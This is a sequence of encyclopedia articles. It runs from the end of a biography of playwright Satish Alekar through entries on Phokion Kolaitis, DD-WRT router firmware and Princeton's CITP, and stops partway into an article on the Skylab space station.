Alekar started writing at the age of 19 as a chemistry graduation, though most of his early work were short plays. Many of his plays are set around Pune Brahmin society, highlighting their narrow mindedness and subsequently he ventured into small-town politics with Doosra Samna (1989). Mahanirvan (1973) (The Dread Departure) finds black humour through Hindu death rites in Brahmins and its overt seriousness is today Alekar's best-known early work and has since been performed in Bengali, Hindi, Dongri, Konkani and Gujarati. It was originally a one-act play and he had later expanded it at Patel's insistence. It was first staged on 22 November 1974 at the Bharat Natya Mandir, by the Theatre Academy, Pune and was revived in 1999 for its 25th anniversary, and was performed at the same venue, with most of the original cast intact.
Mickey Ani Memsaheb (1974) was his first full-length script. With the exception of his Mahapoor (1975), he directed all of his own plays. Alekar's Begum Barve (1979) is regarded as a classic of contemporary Marathi theatre. It deals with the eponymous female impersonator's memories and fantasies. After his musical company closed down, a minor singer-actor starts selling incense sticks on the street and gets exploited by his employer. One day his fantasies get enmeshed with those of a pair of clerks who were his regular customers, and those fantasies get almost fulfilled. The play staged in Rajasthani, Punjabi, Gujarati, Bengali, Konkani, Tamil and Kannada. In 2009, 30 years after its first production, the play returned to Mumbai with its original cast of Chandrakant Kale, and Mohan Aghashe.
Alekar's other plays are Bhajan, Bhinta, Walan, Shanivar-Ravivar (1982), Dusra Samna (1987), and Atireki (1990). The first three are one-act plays. Atireki is marked by irony, wit, and tangential take-offs from absurd premises. In January 2011 a book of short plays translated/adapted into Marathi by Satish Alekar published by M/s Neelkanth Prakashan, Pune under the title "Adharit Ekankika".
Two Crtique published on plays Mahanirvan (Dread Departure) and Begum Barve in Marathi:
1) "Mahanirvan: Sameeksha aani Sansmarne" (महानिर्वाण समिक्षा आणि संस्मरणे) (A volume of critique in Marathi on the play ' Mahanirvan'-Dread Departure Edited by Dr. Rekha Inmadar-Sane published by M/s Rajhans Prakashan, Pune, I Edition Dec 1999, II Edition March 2008, , Pages: 254, Price Rs.250/-) The volume first published in 1999 to mark the 25th year run of the production of the play produced by Theatre Academy, Pune directed by Satish Alekar. Volume included 90 pages of the extensive interview of the playwright Satish Alekar.
2) "Begum Barve Vishayee" (बेगम बर्वे विषयी) (About the play Begum Barve) Edited by Dr. Rekha Inamdar-Sane published in June 2010 by M/s Rajhans Prakashan, Pune,
Pages 169, Price: Rs. 200/- The books has nine articles analysing the text and the performance written by well-known theatre scholars.
Acting reading performance
Aparichit Pu La (अपरिचित पु.लं.), (2018) a 90 mints acting reading programme on the lesser-known writings of the legendary writer, performer P. L. Deshpande पु.ल.देशपांडे (1919–2000) produced by Shabda Vedh, Pune (शब्द वेध,पुणे) to mark the birth centenary of the writer, conceived by Chandrakant Kale, cast: Satish Alekar, Chandrakant Kale and Girish Kulkarni. First show was performed in Pulotsav on 22 November 2018 at Balgamdharva Ranga Mandir, Pune. Since opening of the show in November 2018, performances were staged in Pune, Solapur, Ratnagiri and Mumbai.
Film scripts
Alekar scripted the National Film Award winning Marathi feature film Jait Re Jait in 1977, directed by Jabbar Patel, and later he directed a 13-part Hindi TV serial Dekho Magar Pyarse for Doordarshan in 1985. He scripted the dialogues for the Marathi feature film Katha Don Ganpatravanchi in 1995–96.
Writing for Marathi newspaper
Written a fortnightly column in Marathi for Sunday edition of Loksatta 'Gaganika' January–December 2015. Column is based on Satish Alekar's journey in to Performing Arts since 1965. The column became popular and now the book "Gaganika" (pages 260+12+ 8 P photos, Hb Rs. 375/- Pb Rs. 300/-based on the column is published on 30 April 2017 by M/s Rajahans Prakashan, Pune 411030.([email protected] Tel: +91-20-24473459)
Awards and recognition
Some of Alekar's plays have been translated and produced in Hindi, Bengali, Tamil, Dogri, Kannada, Gujarati, Rajasthani, Punjabi, and Konkani. His plays have been included in the National Anthologies published in 2000–01 by the National School of Drama and Sahitya Akademi, Delhi.
Alekar is the recipient of several national and state awards for his contribution to the field of Theater and Literature.
In 1974 his collection of short plays "Zulta Pool (झुलता पूल" received best collection of short plays award from Ministry of Culture, Govt. of Maharashtra.
In 1975 he received Late Ram Ganesh Gadkari award from the State of Maharashtra for his play Mahanirvan (महानिर्वाण).
He received Nandikar Sanman at Calcutta in 1992.
He received fellowships from the Asian Cultural Council, New York in 1983 to study theatre in the US, and from the Ford Foundation to study Theatre of South Asia in 1988.
He received in 1994 a Sangeet Natak Akademi Award for playwriting from Sangeet Natak Akademi, Delhi (संगीत नाटक अकादमी, दिल्ली).
Received State Award Best Actor in Comedy Role played in Marathi film Katha Don Ganpatravanchi (कथा दोन गणपतरावांची ), Directed by Arun Khopkar (1997)
Received Vi Va Shirwadkar award (Poet Kusumagraj) for playwriting by Natya Parishad, Nasik in 2007
Received Life Time Achievement felicitation (जीवन गौरव) by Akhil Bharatiya Marathi Natya Parishad, Mumbai in Feb 2012
He received the award "Padamshree" (पद्मश्री) conferred by the President of India in January 2012.
In December 2013 Satish Alekar received Balaraj Sahani Memorial Award (बलराज सहानी स्मृती पुरस्कार) in Pune for his contribution over last 40 years as a playwright, director and actor.
In 2014 he was awarded Poet and Playwright "Aarati Prabhu Award (कवि आरती प्रभू )" by Baba Vardam Theatres, Kudal, Dist. Sindhudurg.
2017 Tanveer Sanman (तन्वीर सन्मान) Prestigious national award for the lifetime contribution to the field of Theatre constituted by veteran actor Dr. Shriram Lagoo through Rupavedh Pratisthan, Pune. Award function was held in Pune on 9 December 2017.
2018 Book GAGANIKA (गगनिका) received Advt Tryambakrao Shirole award for best non fiction (उत्कृष्ट ललित गद्य) by Maharashtra Sahitya Parishad, PuneNatakkar Satish Alekar (Playwright Satish Alekar), a 90-minute film by Atul Pethe about Alekar's life and work was released in 2008.
Works
The dread departure (Mahanirvan), tr. by Gauri Deshpande. Seagull Books, 1989. .
"Collected Plays of Satish Alekar. OUP, Delhi 2009, "
"Collected Plays of Satish Alekar"
Academic Honour
Following Scholars have completed their Ph.D. research on the creative contribution of Satish Alekar as a playwright.
Sarjerao Rankhamb, Deglur, awarded Ph.D. by SPPU for the research “नाटककार सतीश आळेकर: एक आकलन”, under the guidance of Dr. Manohar Jadhav, Marathi Department, SPPU in July 2019.
Smita Rambhau Shinde, Sinnar was awarded her Ph.D. on February 25, 2020 by SPPU for her research on the topic: Reality and Fantasy in the selected plays of Satish Alekar under the guidance of Dr. Rohit Kavle, Sangamner College, Sagamner.
Sapanprit: Semiotic Universe of Selected Plays of Satish Alekar and Swarajbir, Central University of Punjab, Bhatinda under the guidance of Dr. Ramanpreet Kaur.
Neeraj Balasaheb Borse, Dr. Babasaheb Ambedkar Marathwada University, Aurangabad submitted his Ph.D. thesis on the subject “सतीश आळेकर यांच्या नाटकांचा संहितालक्षी आणि प्रयोलक्षी अभ्यास “under the guidance of Dr. Chandrasekhar Kanse, Sirsala, Beed
Acting in plays
1971: As young Man in a short play "Ek Zulta Pool" directed by himself for Intercollegiate Short Play Competition
1974: As the son "Nana" in play "Mahanirvan" directed by himself for Theatre Academy, Pune in more than 100 shows
1979: As Javadekar in play "Begum Barve" directed by himselh for Theatre Academy, Pune
1982: Short play "Boat Futli" Directed by Samar Nakhate for Theatre Academy, Pune.
1980: As husband in "Shanwar Raviwar" directed by himself for Theatre Academy, Pune
Acting in Hindi films (character roles)
Ye Kahani Nahi (1984) Dir. Biplav Rai Chowdhary
Dumkata (2007) Dir. Amol Palekar
Aiyaa (2012) Dir. Sachin Kundalkar
Dekh Tamasha Desk (2014) Dir. Feroz Abbas Khan
Thackeray- A biopic on Shiv Sena Founder Balasaheb Thackeray (2018) as Jayprakash Narayan Dir by Abhijit Panse (released on 23 Jan 2019)
'83 (2019) a film on Indian Cricket Team's win in 1983 World Cup as Sheshrao Wankhede, Dir Kabir Khan, Produced by Vishnuvardhan Induri and Madhu Mantena Varma (released on December 24, 2021 all over)
Cafe Good Luck (2022) as Ramesh Kulkarni Dir Vishal Inamdar, Produced by Rakesh Kudalkar for Good Entertainment (in making)
Acting in Marathi films /Web Series (character roles)
Aakrit (1981) Dir. Amol Palekar
Umbartha (1982) Dir. Jabbar Patel
Dhyas Parva (2001)Dir Amol Palekar
Dr. Babasaheb Ambedkar (1991) Dir. Jabbar Patel
Ek Hota Vidushak (1992) Dir. Jabbar Patel
Katha Don Ganpatravaanchee (1996) Dir. Arun Khopkar (role of Judge which was awarded for the Best Actor (Comedy), Govt. of Maharashtra)
Kadachit (2007) as a Neurosurgeon Dir. Chandrakant Kulkarni
Chintoo (2012), as Colonel Kaka, Dir.Shrirang Godbole
Chintoo 2 (Khajinyachi Chittarkatha) as Colonel Kaka 2013 Dir.Shrirang Godbole
Hovoon Jaudyaa- We Are On! (2013) Dir. Amol Palekar
Mhais (2013) Dir. Shekhar Naik
Aajachaa Diwas Maazaa (2013) Dir. Chandrakant Kulkarni
Yeshwantrao Chavan – Katha Eka Vadalachi (2014) Dir. Jabbar Patel
Deul Band (2015) Dir. Praveen Tarade
Welcome Zindagi (2015) Dir. Umesh Ghadge
High Way (2015) Dir: Umesh Kulkarni
Rajwade and Sons as Rajwade (2015) Dir. Sachin Kundalkar
Jaudyana Balasaheb! (2015) Dir. Girish Kulkarni (Released in October 2016 through Zee Cinema)
Ventilator (2016) Movie as Bhau, Dir. Rajesh Mapuskar, Produced by Priyanka Chopra, World Premier on 23 Oct 2016 during MAMI Festival in Mumbai (National Awardee Film)
Chi. Va. Chi. Sou. Ka (2017) as Bhudargadkar, Dir. Paresh Mokashi, Produced by Zee Cinema (released on 19 May 2017)
Mala Kahich Problem Naahi as Father (2017) Dir. Sameer Vidhwans, Produced by Filmy Keeda Entertainment, Mumbai (released on 11 August 2017)
Mee Shivaji Park (2017) as Satish Joshi, Dir. Mahesh Waman Manjrekar, Produced by Gouri Films, Pune (Released on 18 October 2018)
Thackeray (2018) Biopic film on Balasaheb Thackeray (Hindi/Marathi) as Jayprakash Narayan, Dir Abhijit Panse, Produced by Raut'Ters Entertainment (released on 23 Jan 2019)
Bhai: Vyakti ki Valli Part I (2018) a Biopic (made in two parts) on Pu La Deshpande as Ramakant Deshpande Dir Mahesh Manjrekar Produced by The Great Maratha Entertainment (released on 4 Jan 2019)
Bhai: Vyakti ki Valli Part II (2018) a Biopic on Pu La Deshpande as Ramakant Deshpande Dir Mahesh Manjrekar Produced by The Great Maratha Entertainment (Released on 8 Feb 2019)
Smile Please (2019) as Appa Joshi (father), Directed by Vikrum Phadnis Produced by Nisha Shah and Sanika Gandhi.( released on 19 July 2019) streaming on Prime Video
" Panchak " 2019) as Bal Kaka. Directed by Jayant Jathar, Produced by RnM Films (by Shriram Nene and Madhuri Dixit)' to be leased soon.
Pet-Puran (2021) as Lt. Col. Jarasandh Wagh(Retd) Web Series for Sony Liv Directed by Dyanesh Zoting (Season I, to be released in early 2022)
Ek Don Teen Char - एक दोन तीन चार (2022) as Dr. Vivek Joshi Marathi film by Varun Narvekar, Produced by Jio Studios (in making)
Acting in TV commercials and Short Films
Products:
TV Cable Co.: Tata Sky (2010)
Car: Honda Ameze (2013)for Appostophe, Mumbai
Cell Phone Company:Idea -Telephone Exchange (2013) for Chrome Pictures, Mumbai
New York Life Insurance (2012)
Online Purchase : SNAPDEAL (2016) for Chrome Pictures,Mumbai
Fiama Di Willis Body Wash (2018) for Apostrophe Films, Mumbai Dir Kaushik Sarkar Link: https://www.youtube.com/watch?v=-WZyvU0n68k
Reunion Episode 3 Language: Marathi (2018) Pickle Brand Presented by Ravetkar Group, Pune Dir Varun Narvekar (short Film) Link: https://www.youtube.com/watch?v=d5uzHiMeMAc
maateech swapna मातीचं स्वप्न (2018) a short film in Marathi for Chitale Bandhu Mithaiwale (चितळे बंधू), Produced by Multimedia Tools,Pune Directed by Varun Narvekar
Reunion for Ravetkar Group (2018) : A three minutes short film made about the awareness for early treatment in Brain Stroke made by Ruby Hall Clinic, Pune Link: https://www.youtube.com/watch?v=d5uzHiMeMAc&t=25s
रुची पालट/Fusion Food/ Chitale Bandhoo (2019): for Chitale Bandhoo, Pune Link: https://www.youtube.com/watch?v=9vnnp5zq0zY
Cotten King Brand- Just Strech Your Limits (2020) Directed by Varun Narvekar Link: https://www.youtube.com/watch?v=iqJirxo_0MQ
Red Label Tea (2021) Ad film for Hindustan Unilever directed by Gajraj Rao for Code Red Films, Mumbai
Short Film ‘Fala (फळा - तिमिरातून तेजाकडे 2021), Produced by Kc Productions, Dir. Mangesh Jagtap
References
Collected Plays of Satish Alekar. OUP, Delhi 2009, \
"Mahanirvan: Sameeksha aani Sansmarne" (A volume of critique in Marathi on the play, Edited by Dr. Rekha Inmadar-Sane published by M/s Rajhans Prakashan, Pune,I Edition Dec 1999, II Edition March 2008, , Pages: 254, Price Rs.250/-)
"Begum Barve Vishayee" (About the play Begum Barve) Edited by Dr. Rekha Inamdar-Sane published in June 2010 by M/s Rajhans Prakashan, Pune, Pages 169, Price: Rs. 200/- The book has nine articles analysing the text and the performance written by well-known theatre scholars.
Link to the Short Film Reunion Episode 3 (2018) https://www.youtube.com/watch?v=d5uzHiMeMAc
External links
Satish Alekar website
Memory by Satish Alekar at Little magazine''
Documentary film on Satish Alekar directed by Atul Pethe (2008,90 mints)
Book Review of Gaganika by Shanta Gokhale for Pune Mirror 1 June 2017
Look back in humour
Indian theatre directors
Indian male dramatists and playwrights
Marathi-language writers
1949 births
Living people
Indian male stage actors
Savitribai Phule Pune University faculty
Asian Cultural Council grantees
Recipients of the Sangeet Natak Akademi Award
Male actors in Marathi theatre
Dramatists and playwrights from Delhi
Tisch School of the Arts faculty
Recipients of the Padma Shri in arts
20th-century Indian male actors
Male actors from Delhi
20th-century Indian dramatists and playwrights
|
61262712
|
https://en.wikipedia.org/wiki/Phokion%20G.%20Kolaitis
|
Phokion G. Kolaitis
|
Phokion G. Kolaitis ACM (born July 4, 1950) is a computer scientist who is currently a Distinguished Research Professor at UC Santa Cruz and a Principal Research Staff Member at the IBM Almaden Research Center. His research interests include principles of database systems, logic in computer science, and computational complexity.
Education
Kolaitis obtained a Bachelor's Degree in Mathematics from the University of Athens in 1973 and a Master's Degree and Ph.D in Mathematics from the University of California, Los Angeles in 1974 and 1978, respectively.
Career and research
Kolaitis is currently a Distinguished Research Professor at the Computer Science and Engineering Department of University of California, Santa Cruz. He is also a Principal Research Staff Member in the theory group at the IBM Almaden Research Center. He is known for his work on principles of database systems, logic in computer science, computational complexity, and other related fields.
Selected publications
Data exchange: semantics and query answering, R Fagin, PG Kolaitis, RJ Miller, L Popa, Theoretical Computer Science 336 (1), 89-124
Conjunctive-query containment and constraint satisfaction, PG Kolaitis, MY Vardi, Journal of Computer and System Sciences 61 (2), 302-332
Data exchange: getting to the core, R Fagin, PG Kolaitis, L Popa, ACM Transactions on Database Systems (TODS) 30 (1), 174-210
Composing schema mappings: Second-order dependencies to the rescue, R Fagin, PG Kolaitis, L Popa, WC Tan, ACM Transactions on Database Systems (TODS) 30 (4), 994-1055
On the decision problem for two-variable first-order logic, E Grädel, PG Kolaitis, MY Vardi, Bulletin of symbolic logic, 53-69
Recognition
1993 Guggenheim Fellowship, John Simon Guggenheim Memorial Foundation
2005 Fellow, Association for Computing Machinery
2007 Foreign Member, Finnish Academy of Science and Letters
2008 Association for Computing Machinery PODS Alberto O. Mendelzon Test-of-Time Award for the paper “Conjunctive-Query Contain-ment and Constraint Satisfaction” (co-authored with Moshe Y. Vardi)
2010 Fellow, American Association for the Advancement of Science
2013 International Conference on Database Theory Test-of-Time Award for the paper “Data Exchange: Semantics and Query Answering” (co-authored with R. Fagin, R.J. Miller, and L. Popa)
2014 Honorary Doctoral Degree, Department of Mathematics and Department of Informatics & Telecommunications, University of Athens, Greece
2014 Association for Computing Machinery PODS Alberto O. Mendelzon Test-of-Time Award for the paper “Composing Schema Mappings: Second-Order Logic to the Rescue” (co-authored with R. Fagin, L. Popa, and W.-C. Tan)
2017 Foreign Member, Academia Europaea
2020 Alonzo Church Award for Outstanding Contributions to Logic and Computation (Co-Winner)
References
External links
UC Santa Cruz homepage
Living people
Greek scientists
Greek mathematicians
1950 births
|
3197446
|
https://en.wikipedia.org/wiki/DD-WRT
|
DD-WRT
|
DD-WRT is Linux-based firmware for wireless routers and access points. Originally designed for the Linksys WRT54G series, it now runs on a wide variety of models. DD-WRT is one of a handful of third-party firmware projects designed to replace manufacturer's original firmware with custom firmware offering additional features or functionality.
Sebastian Gottschall, a.k.a. "BrainSlayer", is the founder and primary maintainer of the DD-WRT project. The letters "DD" in the project name are the German license-plate letters for vehicles from Dresden, where the development team lived. The remainder of the name was taken from the Linksys WRT54G model router, a home router popular in 2002–2004. WRT is assumed to be a reference to 'wireless router'.
Buffalo Technology and other companies have shipped routers with factory-installed, customized versions of DD-WRT. In January 2016, Linksys started to offer DD-WRT firmware for their routers.
Features
Among the common features of DD-WRT are
access control
bandwidth monitoring
quality of service
WPA/WPA2/WPA3 (personal and enterprise)
iptables and IPset (on some models) & SPI firewall
Universal Plug and Play
Wake-on-LAN
Dynamic DNS
AnchorFree VPN
wireless access point configuration
WDS - Wireless Distribution System
multiple SSIDs
overclocking
transmission power control
Transmission BitTorrent client
Tor
router linking
ssh
telnet
RADIUS support
XLink Kai networks
OpenVPN
WireGuard
It is also possible to build a bespoke firmware package.
Version history
Router hardware supported
DD-WRT supports many different router models, both new and obsolete. The project maintains a full list of currently supported models and known incompatible devices.
See also
BusyBox
List of router firmware projects
References
External links
DD-WRT Forum
DD-WRT software version control
Custom firmware
Free system software
Routing software
Linux distributions without systemd
Linux distributions
|
45151468
|
https://en.wikipedia.org/wiki/Center%20for%20Information%20Technology%20Policy
|
Center for Information Technology Policy
|
The Center for Information Technology Policy (CITP) at Princeton University is a leading interdisciplinary research center, dedicated to exploring the intersection of technology, engineering, public policy, and the social sciences. Faculty, students, and other researchers come from a variety of disciplines, including Computer Science, Economics, Politics, Engineering, Sociology, and the Woodrow Wilson School of Public and International Affairs.
Research areas and projects
The CITP conducts research in a number of areas, such as Internet of things, artificial intelligence and machine learning, blockchain and cryptocurrencies, electronic voting, government transparency, and intellectual property. Various media outlets, government agencies, and private organizations have cited the research of the CITP. The current Director of the CITP is Matthew J. Salganik, a professor of sociology at Princeton University.
Voting
One of the leading research initiatives at the CITP centers on electronic voting. Edward Felten, Ariel J. Feldman, and J. Alex Halderman conducted security analysis on a Diebold AccuVote-TS voting machine, one of the most widely used machines of its kind. They discovered a method that allowed them to upload malicious programs to multiple voting machines. Their research gained additional media attention when it was brought before the U.S. Senate Select Committee on Intelligence in June 2017.
Interconnection Measurement Project
The Interconnection Measurement Project is an annual initiative at the CITP that provides ongoing data collection and analysis from ISP interconnection points. Aggregated data serving roughly 50 percent of residential broadband subscribes is collected every 5 minutes.
Academics
The CITP offers an undergraduate certificate in Technology and Society, Information Technology Track. This program requires students to complete a combination of core, technology, societal, and breadth courses in and outside the area of information technology. The goal of the program is to help students better understand how technology drives social change and how society itself shapes technology. The CITP also hosts a number of workshops, policy briefings, lecture series, and initiatives at Princeton University.
References
External links
Princeton University
Research institutes in the United States
2007 establishments in New Jersey
|
29441
|
https://en.wikipedia.org/wiki/Skylab
|
Skylab
|
Skylab was the first United States space station, launched by NASA, occupied for about 24 weeks between May 1973 and February 1974. It was operated by three separate three-astronaut crews: Skylab 2, Skylab 3, and Skylab 4. Major operations included an orbital workshop, a solar observatory, Earth observation, and hundreds of experiments.
Unable to be re-boosted by the Space Shuttle, which was not ready until 1981, Skylab's orbit decayed, and it disintegrated in the atmosphere on July 11, 1979, scattering debris across the Indian Ocean and Western Australia.
Overview
Skylab was the only space station operated exclusively by the United States. A permanent station was planned starting in 1988, but funding for this was canceled and replaced with United States participation in an International Space Station in 1993.
Skylab had a mass of with a Apollo command and service module (CSM) attached and included a workshop, a solar observatory, and several hundred life science and physical science experiments. It was launched uncrewed into low Earth orbit by a Saturn V rocket modified to be similar to the Saturn INT-21, with the S-IVB third stage not available for propulsion because the orbital workshop was built out of it. This was the final flight for the rocket more commonly known for carrying the crewed Apollo Moon landing missions. Three subsequent missions delivered three-astronaut crews in the Apollo CSM launched by the smaller Saturn IB rocket.
Configuration
Skylab included the Apollo Telescope Mount (a multi-spectral solar observatory), a multiple docking adapter with two docking ports, an airlock module with extravehicular activity (EVA) hatches, and the orbital workshop, the main habitable space inside Skylab. Electrical power came from solar arrays and fuel cells in the docked Apollo CSM. The rear of the station included a large waste tank, propellant tanks for maneuvering jets, and a heat radiator. Astronauts conducted numerous experiments aboard Skylab during its operational life.
Operations
For the final two crewed missions to Skylab, NASA assembled a backup Apollo CSM/Saturn IB in case an in-orbit rescue mission was needed, but this vehicle was never flown. The station was damaged during launch when the micrometeoroid shield tore away from the workshop, taking one of the main solar panel arrays with it and jamming the other main array. This deprived Skylab of most of its electrical power and also removed protection from intense solar heating, threatening to make it unusable. The first crew deployed a replacement heat shade and freed the jammed solar panels to save Skylab. This was the first time that a repair of this magnitude was performed in space.
The Apollo Telescope significantly advanced solar science, and observation of the Sun was unprecedented. Astronauts took thousands of photographs of Earth, and the Earth Resources Experiment Package (EREP) viewed Earth with sensors that recorded data in the visible, infrared, and microwave spectral regions. The record for human time spent in orbit was extended beyond the 23 days set by the Soyuz 11 crew aboard Salyut 1 to 84 days by the Skylab 4 crew.
Later plans to reuse Skylab were stymied by delays in the development of the Space Shuttle, and Skylab's decaying orbit could not be stopped. Skylab's atmospheric reentry began on July 11, 1979, amid worldwide media attention. Before re-entry, NASA ground controllers tried to adjust Skylab's orbit to minimize the risk of debris landing in populated areas, targeting the south Indian Ocean, which was partially successful. Debris showered Western Australia, and recovered pieces indicated that the station had disintegrated lower than expected. As the Skylab program drew to a close, NASA's focus had shifted to the development of the Space Shuttle. NASA space station and laboratory projects included Spacelab, Shuttle-Mir, and Space Station Freedom, which was merged into the International Space Station.
Background
Rocket engineer Wernher von Braun, science fiction writer Arthur C. Clarke, and other early advocates of crewed space travel, expected until the 1960s that a space station would be an important early step in space exploration. Von Braun participated in the publishing of a series of influential articles in Collier's magazine from 1952 to 1954, titled "Man Will Conquer Space Soon!". He envisioned a large, circular station 250 feet (75 m) in diameter that would rotate to generate artificial gravity and require a fleet of 7,000-ton (6,400 metric tons) space shuttles for construction in orbit. The 80 men aboard the station would include astronomers operating a telescope, meteorologists to forecast the weather, and soldiers to conduct surveillance. Von Braun expected that future expeditions to the Moon and Mars would leave from the station.
The development of the transistor, the solar cell, and telemetry, led in the 1950s and early 1960s to uncrewed satellites that could take photographs of weather patterns or enemy nuclear weapons and send them to Earth. A large station was no longer necessary for such purposes, and the United States Apollo program to send men to the Moon chose a mission mode that would not need in-orbit assembly. A smaller station that a single rocket could launch retained value, however, for scientific purposes.
Early studies
In 1959, von Braun, head of the Development Operations Division at the Army Ballistic Missile Agency, submitted his final Project Horizon plans to the U.S. Army. The overall goal of Horizon was to place men on the Moon, a mission that would soon be taken over by the rapidly forming NASA. Although concentrating on the Moon missions, von Braun also detailed an orbiting laboratory built out of a Horizon upper stage, an idea used for Skylab. A number of NASA centers studied various space station designs in the early 1960s. Studies generally looked at platforms launched by the Saturn V, followed up by crews launched on Saturn IB using an Apollo command and service module, or a Gemini capsule on a Titan II-C, the latter being much less expensive in the case where cargo was not needed. Proposals ranged from an Apollo-based station with two to three men, or a small "canister" for four men with Gemini capsules resupplying it, to a large, rotating station with 24 men and an operating lifetime of about five years. A proposal to study the use of a Saturn S-IVB as a crewed space laboratory was documented in 1962 by the Douglas Aircraft Company.
Air Force plans
The Department of Defense (DoD) and NASA cooperated closely in many areas of space. In September 1963, NASA and the DoD agreed to cooperate in building a space station. The DoD wanted its own crewed facility, however, and in December 1963 it announced Manned Orbital Laboratory (MOL), a small space station primarily intended for photo reconnaissance using large telescopes directed by a two-person crew. The station was the same diameter as a Titan II upper stage, and would be launched with the crew riding atop in a modified Gemini capsule with a hatch cut into the heat shield on the bottom of the capsule. MOL competed for funding with a NASA station for the next five years and politicians and other officials often suggested that NASA participate in MOL or use the DoD design. The military project led to changes to the NASA plans so that they would resemble MOL less.
Development
Apollo Applications Program
NASA management was concerned about losing the 400,000 workers involved in Apollo after landing on the Moon in 1969. A reason von Braun, head of NASA's Marshall Space Flight Center during the 1960s, advocated for a smaller station after his large one was not built was that he wished to provide his employees with work beyond developing the Saturn rockets, which would be completed relatively early during Project Apollo. NASA set up the Apollo Logistic Support System Office, originally intended to study various ways to modify the Apollo hardware for scientific missions. The office initially proposed a number of projects for direct scientific study, including an extended-stay lunar mission which required two Saturn V launchers, a "lunar truck" based on the Lunar Module (LM), a large, crewed solar telescope using an LM as its crew quarters, and small space stations using a variety of LM or CSM-based hardware. Although it did not look at the space station specifically, over the next two years the office would become increasingly dedicated to this role. In August 1965, the office was renamed, becoming the Apollo Applications Program (AAP).
As part of their general work, in August 1964 the Manned Spacecraft Center (MSC) presented studies on an expendable lab known as Apollo X, short for Apollo Extension System. Apollo X would have replaced the LM carried on the top of the S-IVB stage with a small space station slightly larger than the CSM's service area, containing supplies and experiments for missions between 15 and 45 days' duration. Using this study as a baseline, a number of different mission profiles were looked at over the next six months.
Wet workshop
In November 1964, von Braun proposed a more ambitious plan to build a much larger station built from the S-II second stage of a Saturn V. His design replaced the S-IVB third stage with an aeroshell, primarily as an adapter for the CSM on top. Inside the shell was a cylindrical equipment section. On reaching orbit, the S-II second stage would be vented to remove any remaining hydrogen fuel, then the equipment section would be slid into it via a large inspection hatch. This became known as a "wet workshop" concept, because of the conversion of an active fuel tank. The station filled the entire interior of the S-II stage's hydrogen tank, with the equipment section forming a "spine" and living quarters located between it and the walls of the booster. This would have resulted in a very large living area. Power was to be provided by solar cells lining the outside of the S-II stage.
One problem with this proposal was that it required a dedicated Saturn V launch to fly the station. At the time the design was being proposed, it was not known how many of the then-contracted Saturn Vs would be required to achieve a successful Moon landing. However, several planned Earth-orbit test missions for the LM and CSM had been canceled, leaving a number of Saturn IBs free for use. Further work led to the idea of building a smaller "wet workshop" based on the S-IVB, launched as the second stage of a Saturn IB.
A number of S-IVB-based stations were studied at MSC from mid-1965, which had much in common with the Skylab design that eventually flew. An airlock would be attached to the hydrogen tank, in the area designed to hold the LM, and a minimum amount of equipment would be installed in the tank itself in order to avoid taking up too much fuel volume. Floors of the station would be made from an open metal framework that allowed the fuel to flow through it. After launch, a follow-up mission launched by a Saturn IB would launch additional equipment, including solar panels, an equipment section and docking adapter, and various experiments. Douglas Aircraft Company, builder of the S-IVB stage, was asked to prepare proposals along these lines. The company had for several years been proposing stations based on the S-IV stage, before it was replaced by the S-IVB.
On April 1, 1966, MSC sent out contracts to Douglas, Grumman, and McDonnell for the conversion of an S-IVB spent stage, under the name Saturn S-IVB spent-stage experiment support module (SSESM). In May 1966, astronauts voiced concerns over the purging of the stage's hydrogen tank in space. Nevertheless, in late July 1966, it was announced that the Orbital Workshop would be launched as a part of Apollo mission AS-209, originally one of the Earth-orbit CSM test launches, followed by two Saturn I/CSM crew launches, AAP-1 and AAP-2.
The Manned Orbiting Laboratory (MOL) remained AAP's chief competitor for funds, although the two programs cooperated on technology. NASA considered flying experiments on MOL or using its Titan IIIC booster instead of the much more expensive Saturn IB. The agency decided that the Air Force station was not large enough and that converting Apollo hardware for use with Titan would be too slow and too expensive. The DoD later canceled MOL in June 1969.
Dry workshop
Design work continued over the next two years, in an era of shrinking budgets. (NASA sought US$450 million for Apollo Applications in fiscal year 1967, for example, but received US$42 million.) In August 1967, the agency announced that the lunar mapping and base construction missions examined by the AAP were being canceled. Only the Earth-orbiting missions remained, namely the Orbital Workshop and Apollo Telescope Mount solar observatory.
The success of Apollo 8 in December 1968, launched on the third flight of a Saturn V, made it likely that one would be available to launch a dry workshop. Later, several Moon missions were canceled as well, originally to be Apollo missions 18 through 20. The cancellation of these missions freed up three Saturn V boosters for the AAP program. Although this would have allowed them to develop von Braun's original S-II-based mission, by this time so much work had been done on the S-IV-based design that work continued on this baseline. With the extra power available, the wet workshop was no longer needed; the S-IC and S-II lower stages could launch a "dry workshop", with its interior already prepared, directly into orbit.
Habitability
A dry workshop simplified plans for the interior of the station. Industrial design firm Raymond Loewy/William Snaith recommended emphasizing habitability and comfort for the astronauts by providing a wardroom for meals and relaxation and a window to view Earth and space, although astronauts were dubious about the designers' focus on details such as color schemes. Habitability had not previously been an area of concern when building spacecraft due to their small size and brief mission durations, but the Skylab missions would last for months. NASA sent a scientist on Jacques Piccard's Ben Franklin submarine in the Gulf Stream in July and August 1969 to learn how six people would live in an enclosed space for four weeks.
Astronauts were uninterested in watching movies on a proposed entertainment center or in playing games, but they did want books and individual music choices. Food was also important; early Apollo crews complained about its quality, and a NASA volunteer found it intolerable to live on the Apollo food for four days on Earth. Its taste and composition were unpleasant, in the form of cubes and squeeze tubes. Skylab food significantly improved on its predecessors by prioritizing palatability over scientific needs.
Each astronaut had a private sleeping area the size of a small walk-in closet, with a curtain, sleeping bag, and locker. Designers also added a shower and a toilet for comfort and to obtain precise urine and feces samples for examination on Earth. The waste samples were so important that they would have been priorities in any rescue mission.
Skylab did not have recycling systems such as the conversion of urine to drinking water; it also did not dispose of waste by dumping it into space. The S-IVB's liquid oxygen tank below the Orbital Work Shop was used to store trash and wastewater, passed through an airlock.
Operational history
Completion and launch
On August 8, 1969, the McDonnell Douglas Corporation received a contract for the conversion of two existing S-IVB stages to the Orbital Workshop configuration. One of the S-IV test stages was shipped to McDonnell Douglas for the construction of a mock-up in January 1970. The Orbital Workshop was renamed "Skylab" in February 1970 as a result of a NASA contest. The actual stage that flew was the upper stage of the AS-212 rocket (the S-IVB stage, S-IVB 212). The mission computer used aboard Skylab was the IBM System/4Pi TC-1, a relative of the AP-101 Space Shuttle computers. The Saturn V with serial number SA-513, originally produced for the Apollo program – before the cancellation of Apollo 18, 19, and 20 – was repurposed and redesigned to launch Skylab. The Saturn V's third stage was removed and replaced with Skylab, but with the controlling Instrument Unit remaining in its standard position.
